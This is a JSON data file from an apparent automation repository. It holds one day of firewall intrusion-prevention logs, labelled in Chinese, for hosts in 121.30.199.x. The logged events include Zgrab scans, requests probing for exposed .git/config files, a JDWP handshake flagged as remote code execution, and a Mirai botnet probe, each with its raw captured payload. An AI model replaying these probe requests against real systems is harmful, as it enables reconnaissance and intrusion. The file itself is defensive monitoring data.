licc/dt_automate
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
dc647c8143
dt_automate/ce.json
李超 30cc9fe3e5 2025.2.27
2025-02-27 18:37:03 +08:00

34 lines
42 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"NTOP":{
"LogPaging":
[{"LogType":"1","ID":"1766","UserID":"65538","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33432,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":24881,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Git 客户端命令执行漏洞(CVE-2014-9390)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:42:32\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"45.144.212.139\",\"User\":\"45.144.212.139\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2014-9390\",\"MSB\":\"\",\"BID\":\"BID-71732\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/objects\/\",\"Payload\":\"GET \/.git\/objects\/ HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/76.0.3809.100 Safari\/537.36\\\\0d\\\\0aAccept-Charset: utf-8\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"CommandInjection\",\"MethodSubNameCN\":\"命令注入\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"131074","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":39780,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:25:52\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"66.240.236.109\",\"User\":\"66.240.236.109\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"196610","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":26451,\"DestPort\":443,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35764,\"Severity\":30,\"HddInfo\":false,\"Application\":\"general_tcp\",\"ThreatName\":\"CVE-2017-6639_Oracle_Java_Debug_Wire_远程调试漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:13:37\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"64.226.111.62\",\"User\":\"64.226.111.62\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2017-6639\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\"\",\"HttpFirstLine\":\"\",\"Payload\":\"JDWP-Handshake\\\\00\\\\00\\\\00\\\\0b\\\\00\\\\00\\\\00\\\\01\\\\00\\\\01\\\\01\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"RemoteCodeExecution\",\"MethodSubNameCN\":\"远程代码执行\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"262146","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:18\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"327682","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"393218","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58968,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:32:38\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"458754","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":50568,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:07:47\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.82\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"524290","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"589826","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:08\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"655362","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33620,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:40\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"720898","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":55748,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:29\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"786434","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58390,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:44:54\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"851970","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"917506","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:20\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"983042","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":46446,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:36:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"35.216.149.150\",\"User\":\"35.216.149.150\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko\/20100101 Firefox\/103.0 abuse.xmco.fr\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1048578","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35580,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35419,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"僵尸网络:Mirai_2.0\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:30:49\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"196.251.85.250\",\"User\":\"196.251.85.250\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80:80\",\"HttpFirstLine\":\"\/login.rsp\",\"Payload\":\" Hello World\\\\0d\\\\0a\",\"MethodName\":\"MalwareTraffic\",\"MethodNameCN\":\"恶意流量\",\"MethodSubName\":\"BotnetTraffic\",\"MethodSubNameCN\":\"僵尸网络流量\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1114114","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":43464,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:12:12\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.70\",\"User\":\"111.225.148.70\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" pcq.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1179650","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":24756,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:27\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
